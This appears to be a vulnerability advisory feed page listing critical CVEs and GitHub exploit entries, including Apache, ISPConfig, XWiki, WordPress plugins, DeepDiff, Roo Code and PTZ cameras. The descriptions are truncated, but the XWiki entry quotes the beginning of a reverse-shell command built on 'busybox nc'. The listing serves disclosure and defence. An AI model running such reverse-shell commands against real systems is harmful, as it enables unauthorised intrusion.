CRITICAL - zero redgem

Recent Advisories

Severity	ID	Title	Vendor	Product	Date	Type
CRITICAL 9.8	A50F22F9-6442-	Exploit for Path Traversal in Apache Http_Server_A50F22F9-6442-52A1-9ECE-32F56C60A888 ````markdown 🔥 CVE-2021-42013 Exploit Framework by Makaveli ...	N/A	N/A	Sep 5, 2025	GITHUBEXPLOIT
CRITICAL 9.8	AC4097E7-E7AD-	Exploit for Code Injection in Ispconfig_AC4097E7-E7AD-57DD-A002-5A3C882EE8C3 CVE-2023-46818 - ISPConfig PHP Code Execution \| Exploit High...	N/A	N/A	Sep 6, 2025	GITHUBEXPLOIT
CRITICAL 9.8	CVE-2025-8359	AdForest <= 6.0.9 - Authentication Bypass to Admin_CVE-2025-8359 The AdForest theme for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 6.0.9. This is due to the plugin not ...	scriptsbundle	AdForest *	Sep 6, 2025	CVE
CRITICAL 9.9	CVE-2025-58371	Roo Code is vulnerable to command injection via GitHub actions workflow_CVE-2025-58371 Roo Code is an AI-powered autonomous coding agent that lives in users' editors. In versions 3.26.6 and below, a Github workflow used unsanitized pu...	RooCodeInc	Roo-Code < 3.26.7	Sep 5, 2025	CVE
CRITICAL 10	CVE-2025-58367	DeepDiff is vulnerable to DoS and Remote Code Execution via Delta class pollution_CVE-2025-58367 DeepDiff is a project focused on Deep Difference and search of any Python data. Versions 5.0.0 through 8.6.0 are vulnerable to class pollution via ...	seperman	deepdiff >= 5.0.0, < 8.6.1	Sep 5, 2025	CVE
CRITICAL 9.1	CVE-2025-58819	WordPress Bulk Featured Image Plugin <= 1.2.2 - Arbitrary File Upload Vulnerability_CVE-2025-58819 Unrestricted Upload of File with Dangerous Type vulnerability in CreedAlly Bulk Featured Image allows Upload a Web Shell to a Web Server. This issu...	CreedAlly	Bulk Featured Image n/a	Sep 5, 2025	CVE
CRITICAL 9.8	CVE-2025-35451	Pan-Tilt-Zoom cameras hard-coded default passwords with SSH and telnet enabled_CVE-2025-35451 PTZOptics and possibly other ValueHD-based pan-tilt-zoom cameras use hard-coded, default administrative credentials. The passwords can readily be c...	PTZOptics	PT12X-SE-xx-G3	Sep 5, 2025	CVE
CRITICAL 9.8	CVE-2025-35452	Pan-Tilt-Zoom cameras default administrative credentials for web interface_CVE-2025-35452 PTZOptics and possibly other ValueHD-based pan-tilt-zoom cameras use default, shared credentials for the administrative web interface.	PTZOptics	PT12X-SE-xx-G3	Sep 5, 2025	CVE
CRITICAL 9.4	CVE-2025-58366	Onyxia private helm repository credentials are leaked through unauthenticated API_CVE-2025-58366 Onyxia is a data science environment for kubernetes. In versions 4.6.0 through 4.8.0, Onyxia-API leaked the credentials of private helm repositorie...	InseeFrLab	onyxia >= 4.6.0, < 4.9.0	Sep 5, 2025	CVE
CRITICAL 9.8	2B7709E2-7063-	Exploit for Code Injection in Xwiki_2B7709E2-7063-53CC-AEB1-9D041C752E37 Reverse shell for CVE-2025-24893 bash python3 CVE-2025-24893.py -u http://wiki.editor.htb/ -c "busybox nc ...	N/A	N/A	Sep 5, 2025	GITHUBEXPLOIT